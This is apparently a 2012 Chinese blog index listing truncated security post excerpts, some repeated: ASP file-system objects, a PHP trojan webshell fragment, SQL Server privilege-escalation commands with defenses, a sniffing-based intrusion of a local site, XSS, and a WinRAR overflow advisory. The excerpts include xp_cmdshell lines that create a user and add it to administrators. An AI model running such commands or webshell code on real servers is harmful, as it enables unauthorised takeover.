2012年7月15日
ASP中FSO并非不安全,让我们发现它的神奇功能
在ASP中,FSO的意思是File System Object,即文件系统对象。我们将要操纵的计算机文件系统,在这里是指位于web服务器之上。所以,确认你对此拥有合适的权限。理想情况下,你可以在自己的机器上建立一个web服务 器,这样就能方便地进行测试。如果运行于Windows平台,请试一试微软公司... Read More
posted @ 2012-07-15 21:02 adodo1 Views(154) Comments(0) Diggs(0)
PHP木马 删除记忆个人加强版 (一)
/*======================================================函数库======================================================*/// 登陆入口function loginpage() {?>Pass... Read More
posted @ 2012-07-15 21:02 adodo1 Views(207) Comments(0) Diggs(0)
SQLServer提升权限相关命令及防范
exec master..xp_cmdshell "net user name password /add"--;exec master..xp_cmdshell "net localgroup administrators name /add"--程序代码开启cmdshell的SQL语句EXEC ... Read More
posted @ 2012-07-15 21:01 adodo1 Views(193) Comments(0) Diggs(0)
SQLServer提升权限相关命令及防范
exec master..xp_cmdshell "net user name password /add"--;exec master..xp_cmdshell "net localgroup administrators name /add"--程序代码开启cmdshell的SQL语句EXEC ... Read More
posted @ 2012-07-15 21:01 adodo1 Views(135) Comments(0) Diggs(0)
巧用嗅探 玩“渗透”(图)
还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗?自从上次入侵之后,网站的管理员想尽了办法堵住了所有SQL注入漏洞,想通过SQL 注入后台管理页面已经没有可能了。真是郁闷,但是转念一想,这正是一个练习技术的好机会,难道除了简单的工具利用外,我就没有其它的办法了吗?一定要想法 子再次拿... Read More
posted @ 2012-07-15 21:00 adodo1 Views(270) Comments(0) Diggs(0)
巧用嗅探 玩“渗透”(图)
还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗?自从上次入侵之后,网站的管理员想尽了办法堵住了所有SQL注入漏洞,想通过SQL 注入后台管理页面已经没有可能了。真是郁闷,但是转念一想,这正是一个练习技术的好机会,难道除了简单的工具利用外,我就没有其它的办法了吗?一定要想法 子再次拿... Read More
posted @ 2012-07-15 21:00 adodo1 Views(189) Comments(0) Diggs(0)
也谈跨站脚本攻击与防御
网络上曾经有过关于跨站脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且 由于这种对于跨站脚本认识上的混乱,导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题,希望本文能给写程序的与研究程序的带来一点思路。还是首先看... Read More
posted @ 2012-07-15 20:59 adodo1 Views(110) Comments(0) Diggs(0)
WINRAR发现溢出漏洞 3.6以下的版本全遭殃!
近日已经有国外媒体报道了存在于WinRAR中的一个文件名处理缓冲区溢出漏洞,这个漏洞可以导致恶意入侵者攻击用户系统。这个漏洞的起因是在WinRAR处理LHA格式文件时的边界条件错误,当一个做过手脚具有特别长文件名的文件被打开时候就会导致本地堆栈缓冲区溢出。目前WinRAR从3.00一直到3.60 B... Read More
posted @ 2012-07-15 20:59 adodo1 Views(141) Comments(0) Diggs(0)
也谈跨站脚本攻击与防御
网络上曾经有过关于跨站脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且 由于这种对于跨站脚本认识上的混乱,导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题,希望本文能给写程序的与研究程序的带来一点思路。还是首先看... Read More
posted @ 2012-07-15 20:59 adodo1 Views(86) Comments(0) Diggs(0)
WINRAR发现溢出漏洞 3.6以下的版本全遭殃!
近日已经有国外媒体报道了存在于WinRAR中的一个文件名处理缓冲区溢出漏洞,这个漏洞可以导致恶意入侵者攻击用户系统。这个漏洞的起因是在WinRAR处理LHA格式文件时的边界条件错误,当一个做过手脚具有特别长文件名的文件被打开时候就会导致本地堆栈缓冲区溢出。目前WinRAR从3.00一直到3.60 B... Read More
posted @ 2012-07-15 20:59 adodo1 Views(157) Comments(0) Diggs(0)